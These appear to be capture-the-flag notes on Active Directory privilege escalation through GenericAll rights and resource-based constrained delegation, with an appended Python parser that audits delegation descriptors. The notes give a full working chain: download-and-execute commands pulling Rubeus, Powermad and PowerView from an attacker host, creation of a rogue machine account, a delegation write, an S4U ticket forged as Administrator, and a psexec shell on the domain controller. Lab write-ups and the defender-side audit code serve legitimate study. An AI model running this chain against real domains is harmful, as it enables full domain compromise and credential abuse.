Priv Esc
Outbound object rights

GenericAll


We are going to create a new machine account
When you create accounts in AD you can specify the password
Now that we know the machine account's password, we can use it to sign tickets
We can then grab the SID
We then grant the new computer the ability to act on behalf of other identities
This will allow the computer to sign Kerberos tickets for users other than itself (S4U)
Now we can request a ticket as Administrator that comes from this machine, and machines in the domain will trust it
Use the ticket to pop a shell
*Evil-WinRM* PS C:\Users\support\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> curl 10.10.14.3/Rubeus.exe -o Rubeus.exe
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Powermad.ps1')
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/PowerView.ps1')

Test permissions
Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota

New-MachineAccount -MachineAccount Adot8Machine -Password $(ConvertTo-SecureString 'adot8' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer Adot8Machine -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer Adot8Machine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

.\Rubeus.exe hash /password:adot8
.\Rubeus.exe s4u /user:Adot8Machine$ /rc4:872E7BD85E304E2AF28DFE1BDAF25D8B /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /ptt

base64 -d ticket.kirbi.b64 > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
impacket-psexec -k -no-pass support.htb/administrator@dc.support.htb
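Added example, not part of these notes: a defender-side parser for the binary security descriptor that the Set-DomainObject step writes into msDS-AllowedToActOnBehalfOfOtherIdentity, so an audit can list which SIDs each computer trusts for delegation (any trustee that is not an expected service account is a finding). The machine-account SID and the descriptor bytes are constructed here; in practice the blob comes from an LDAP read of the attribute.

```python
import struct

def sid_to_str(buf, off):
    """Decode a binary SID at buf[off:] -> ('S-1-5-...', length in bytes)."""
    rev, subcount = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % subcount, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * subcount

def str_to_sid(s):
    """Encode 'S-1-5-21-...' as a binary SID (used only to build the sample below)."""
    parts = s.split("-")
    subs = [int(p) for p in parts[3:]]
    return (bytes([int(parts[1]), len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))

def rbcd_trustees(sd):
    """Return [(sid, access_mask)] for every ACCESS_ALLOWED ACE in the DACL of a
    self-relative security descriptor, i.e. the accounts this computer allows to
    impersonate users to it. An empty list means no RBCD is configured."""
    control = struct.unpack_from("<H", sd, 2)[0]
    dacl_off = struct.unpack_from("<I", sd, 16)[0]
    if not control & 0x0004 or dacl_off == 0:   # SE_DACL_PRESENT clear -> no DACL
        return []
    ace_count = struct.unpack_from("<H", sd, dacl_off + 4)[0]
    off, out = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == 0:                            # ACCESS_ALLOWED_ACE_TYPE
            mask = struct.unpack_from("<I", sd, off + 4)[0]
            out.append((sid_to_str(sd, off + 8)[0], mask))
        off += ace_size
    return out

def build_rbcd_sd(trustee_sids, mask=0xF01FF):
    """Constructed sample with the layout PowerView produces for
    O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<sid>); those SDDL rights sum to 0xF01FF."""
    owner = str_to_sid("S-1-5-32-544")             # BA = BUILTIN\Administrators
    aces = b"".join(struct.pack("<BBHI", 0, 0, 8 + len(str_to_sid(s)), mask) + str_to_sid(s)
                    for s in trustee_sids)
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(trustee_sids), 0) + aces
    hdr = struct.pack("<BBHIIII", 1, 0, 0x8004, 20, 0, 0, 20 + len(owner))  # self-relative, DACL present
    return hdr + owner + acl

if __name__ == "__main__":
    # Hypothetical SID of a freshly created machine account (constructed value).
    blob = build_rbcd_sd(["S-1-5-21-1677581083-3335268939-3880240432-5601"])
    for sid, mask in rbcd_trustees(blob):
        print("trusted for delegation: %s mask=0x%X" % (sid, mask))
```

Pair this with a check of ms-DS-MachineAccountQuota (the page's first PowerView query): a non-zero quota plus a writable msDS-AllowedToActOnBehalfOfOtherIdentity is exactly the combination the notes above exploit.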